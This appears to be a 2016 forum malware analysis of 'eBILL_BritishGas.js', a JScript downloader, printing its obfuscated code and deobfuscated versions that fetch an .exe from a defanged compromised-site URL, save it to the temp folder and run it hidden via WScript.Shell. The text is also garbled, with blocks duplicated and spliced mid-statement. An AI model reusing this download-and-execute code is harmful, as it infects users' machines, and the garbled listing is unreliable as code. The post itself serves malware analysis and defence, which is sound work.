- May 14, 2016
- 1,597
From Malware Vault sample pack : 26-8-16 #7
(Thanks to @Solarquest)
Sample 4 :
eBILL_BritishGas.js
Detection ratio: 3 / 56
Analysis date: 2016-08-26 09:43:39 UTC ( 5 hours, 17 minutes ago )
Same obfuscation method than :
(var names, function names, changed)
https://malwaretips.com/threads/quick-analysis-of-obfuscated-wanda-js-js-locky-m3-eldorado.62394/
https://malwaretips.com/threads/2-fresh-scripted-samples-from-16-8-16-5-62456-js-vbs.62470/
Main part :
try {
...
...
...
Deobfuscated :
try {
...
...
...
Changing the names / simplification :
try {
...
...
...
Similar obfuscated method used in other sample already analyzed (see the links posted above for more info)
The URL doesn't work anymore.
All I can say : the JS downloader only get the file from URL, and try to run it (no deobfuscation stuff like already seen from some previous version of JS/downloader Nemucod version, that modify an obfuscated downloaded file to make it an exe file).
(Thanks to @Solarquest)
Sample 4 :
eBILL_BritishGas.js
Detection ratio: 3 / 56
Analysis date: 2016-08-26 09:43:39 UTC ( 5 hours, 17 minutes ago )
Same obfuscation method than :
(var names, function names, changed)
https://malwaretips.com/threads/quick-analysis-of-obfuscated-wanda-js-js-locky-m3-eldorado.62394/
https://malwaretips.com/threads/2-fresh-scripted-samples-from-16-8-16-5-62456-js-vbs.62470/
Main part :
try {
...
...
...
var azbatkyn9 = ezypuk3[nocyqi[1] + ukrychifny[1] + ezownyzo3[1] + ifxixaknat4[2] + iveddimen3[1]];
var wcutpufy0 = kohypsol0[1] + kyxbytmop0[2] + odrulfisl0[0] + xixryjy0[1] + becapqixwo[2] + izdibgirj[1] + ywuddelti9[0];
var vivoqxulq = lohune1[0] + atefojw6[2] + wdobaltiri0[0] + emtevxykz[3];
var trilzodije0 = new bbivattegzy4(wcutpufy0);
var ubmogh3 = uzuzcozyhq7[0] + umilnenfovg8[1] + kvekcevgy[0] + eqnahlixso2[1];
var icdypvezuh0 = new bbivattegzy4(vivoqxulq);
var azanbekcu7 = new bbivattegzy4(ubmogh3);
var cnewgy7 = ankidalqe[2] + usgozbonerc4[1] + lexsigmyfy4[1] + ujuzohbub0[0] + pixawror2[1] + nagkisata[1] + fguxcinvu8[1] + qkugkuvorlo7[0] + ywuccoxe[1] + ctykorudgo[2] + ukicagedt5[0] + uzviziburt5[2] + uromcysgon[3] + bhuhutfev7[0];
icdypvezuh0[gamypebi[2]]();
azanbekcu7[faqoknecci5[1]](gnyjunykry4[2], cnewgy7, gvegudadj[1] - 68);
var wuku5 = tifowsovj[2] + vlyqymo0[2] + ditiza[0] + icicuby5[1];
var owonfy = trilzodije0[idonbom2[2] + swomhejy6[1] + ipdizyfebt[1] + brygcybu[1] + ismamubax[1] + mnycsezu0[0]](nzefafki5[0] - 339) + erhopyhx[3] + trilzodije0[rexuqto[3] + uclufjelco[1] + ohozgumo[0] + jsyzirzuro[0]]();
icdypvezuh0[afuwpoxho[1] + moqemvo4[3]] = fakkiwvaqu2[0] - 507;
azanbekcu7[kotdoman9[1]]();
icdypvezuh0[ewxenur[0] + zwadibjipy[1]] = jvojapjixt[1] - 504;
if (azanbekcu7[asfylil[3] + oditvifc[0]] == ofguxrasy[1] - 123) {
} catch (expalu6) {}var wcutpufy0 = kohypsol0[1] + kyxbytmop0[2] + odrulfisl0[0] + xixryjy0[1] + becapqixwo[2] + izdibgirj[1] + ywuddelti9[0];
var vivoqxulq = lohune1[0] + atefojw6[2] + wdobaltiri0[0] + emtevxykz[3];
var trilzodije0 = new bbivattegzy4(wcutpufy0);
var ubmogh3 = uzuzcozyhq7[0] + umilnenfovg8[1] + kvekcevgy[0] + eqnahlixso2[1];
var icdypvezuh0 = new bbivattegzy4(vivoqxulq);
var azanbekcu7 = new bbivattegzy4(ubmogh3);
var cnewgy7 = ankidalqe[2] + usgozbonerc4[1] + lexsigmyfy4[1] + ujuzohbub0[0] + pixawror2[1] + nagkisata[1] + fguxcinvu8[1] + qkugkuvorlo7[0] + ywuccoxe[1] + ctykorudgo[2] + ukicagedt5[0] + uzviziburt5[2] + uromcysgon[3] + bhuhutfev7[0];
icdypvezuh0[gamypebi[2]]();
azanbekcu7[faqoknecci5[1]](gnyjunykry4[2], cnewgy7, gvegudadj[1] - 68);
var wuku5 = tifowsovj[2] + vlyqymo0[2] + ditiza[0] + icicuby5[1];
var owonfy = trilzodije0[idonbom2[2] + swomhejy6[1] + ipdizyfebt[1] + brygcybu[1] + ismamubax[1] + mnycsezu0[0]](nzefafki5[0] - 339) + erhopyhx[3] + trilzodije0[rexuqto[3] + uclufjelco[1] + ohozgumo[0] + jsyzirzuro[0]]();
icdypvezuh0[afuwpoxho[1] + moqemvo4[3]] = fakkiwvaqu2[0] - 507;
azanbekcu7[kotdoman9[1]]();
icdypvezuh0[ewxenur[0] + zwadibjipy[1]] = jvojapjixt[1] - 504;
if (azanbekcu7[asfylil[3] + oditvifc[0]] == ofguxrasy[1] - 123) {
icdypvezuh0[lijqyzgex7[0] + etyflobne0[1]](azanbekcu7[hquckyfetsi[1] + iratic[1] + ahashaqu[1] + rmavwyteko[0]]);
var uwosewas = iwumitb[1] + hysepbyn7[2] + blumjuwof[1] + owonfy;
icdypvezuh0[xfosoxpa[0] + uzobvibe[1] + eqyqoqib5[1] + dlabaqtaf5[0]](owonfy);
icdypvezuh0[xqylxuldempi2[2] + yqkojurn9[1]]();
var omybcovcu8 = new bbivattegzy4(wuku5);
omybcovcu8[xuwsijudne[2]](uwosewas, gvegudadj[1] - 68);
}var uwosewas = iwumitb[1] + hysepbyn7[2] + blumjuwof[1] + owonfy;
icdypvezuh0[xfosoxpa[0] + uzobvibe[1] + eqyqoqib5[1] + dlabaqtaf5[0]](owonfy);
icdypvezuh0[xqylxuldempi2[2] + yqkojurn9[1]]();
var omybcovcu8 = new bbivattegzy4(wuku5);
omybcovcu8[xuwsijudne[2]](uwosewas, gvegudadj[1] - 68);
Deobfuscated :
try {
...
...
...
var wcutpufy0 = "Scripting.FileSystemObject";
var vivoqxulq ="ADODB.Stream";
var trilzodije0 = new ActiveXObject("Scripting.FileSystemObject");
var ubmogh3 = "MSXML2.XMLHTTP";
var icdypvezuh0 = new ActiveXObject("ADODB.Stream");
var azanbekcu7 = new ActiveXObject("MSXML2.XMLHTTP");
var cnewgy7 = "hxxp://www.numengo.com/wp-admin/file.exe";
icdypvezuh0.Open();
azanbekcu7.open("GET", cnewgy7, 0);
var wuku5 = "WScript.Shell";
var owonfy = oFso.GetSpecialFolder(2) + "\\" + oFso.GetTempName();
icdypvezuh0.position = 0;
azanbekcu7.send();
icdypvezuh0.Type = 1;
if (azanbekcu7.Status == 200) {
} catch (expalu6) {}var vivoqxulq ="ADODB.Stream";
var trilzodije0 = new ActiveXObject("Scripting.FileSystemObject");
var ubmogh3 = "MSXML2.XMLHTTP";
var icdypvezuh0 = new ActiveXObject("ADODB.Stream");
var azanbekcu7 = new ActiveXObject("MSXML2.XMLHTTP");
var cnewgy7 = "hxxp://www.numengo.com/wp-admin/file.exe";
icdypvezuh0.Open();
azanbekcu7.open("GET", cnewgy7, 0);
var wuku5 = "WScript.Shell";
var owonfy = oFso.GetSpecialFolder(2) + "\\" + oFso.GetTempName();
// "C:\\Users\\DardiM\\AppData\\Local\\Temp\\rad27266.tmp";
// %TEMP%\" +oFso.GetTempName()
// %TEMP%\" +oFso.GetTempName()
azanbekcu7.send();
icdypvezuh0.Type = 1;
if (azanbekcu7.Status == 200) {
icdypvezuh0.write(azanbekcu7.ResponseBody);
var uwosewas =""cmd.exe /c " +owonfy
icdypvezuh0.SaveToFile(owonfy);
icdypvezuh0.Close();
var omybcovcu8 = new ActiveXObject("WScript.Shell");
omybcovcu8.run(uwosewas,0);
}var uwosewas =""cmd.exe /c " +owonfy
icdypvezuh0.SaveToFile(owonfy);
icdypvezuh0.Close();
var omybcovcu8 = new ActiveXObject("WScript.Shell");
omybcovcu8.run(uwosewas,0);
Changing the names / simplification :
try {
...
...
...
var oStream = new ActiveXObject("ADODB.Stream");
var oHttp = new ActiveXObject("MSXML2.XMLHTTP");
var URL = "hxxp://www.numengo.com/wp-admin/file.exe";
var oFso = new ActiveXObject("Scripting.FileSystemObject");
var file = oFso.GetSpecialFolder(2) + "\\" + oFso.GetTempName()
oStream.Open();
oHttp.open("GET", URL, 0);
oStream.position = 0;
oHttp.send();
oStream.Type = 1;
if (oHttp.Status == 200) {
} catch (expalu6) {}var oHttp = new ActiveXObject("MSXML2.XMLHTTP");
var URL = "hxxp://www.numengo.com/wp-admin/file.exe";
var oFso = new ActiveXObject("Scripting.FileSystemObject");
var file = oFso.GetSpecialFolder(2) + "\\" + oFso.GetTempName()
// "%TEMP%\" +oFso.GetTempName()
// Example : "C:\\Users\\DardiM\\AppData\\Local\\Temp\\rad27266.tmp";
// Example : "C:\\Users\\DardiM\\AppData\\Local\\Temp\\rad27266.tmp";
oHttp.open("GET", URL, 0);
oStream.position = 0;
oHttp.send();
oStream.Type = 1;
if (oHttp.Status == 200) {
oStream.write(oHttp.ResponseBody);
var cmd ="cmd.exe /c "+ file;
oStream.SaveToFile(file);
oStream.Close();
var oShell = new ActiveXObject("WScript.Shell");
oShell.run(cmd,0);
}var cmd ="cmd.exe /c "+ file;
oStream.SaveToFile(file);
oStream.Close();
var oShell = new ActiveXObject("WScript.Shell");
oShell.run(cmd,0);
Similar obfuscated method used in other sample already analyzed (see the links posted above for more info)
The URL doesn't work anymore.
All I can say : the JS downloader only get the file from URL, and try to run it (no deobfuscation stuff like already seen from some previous version of JS/downloader Nemucod version, that modify an obfuscated downloaded file to make it an exe file).
Last edited: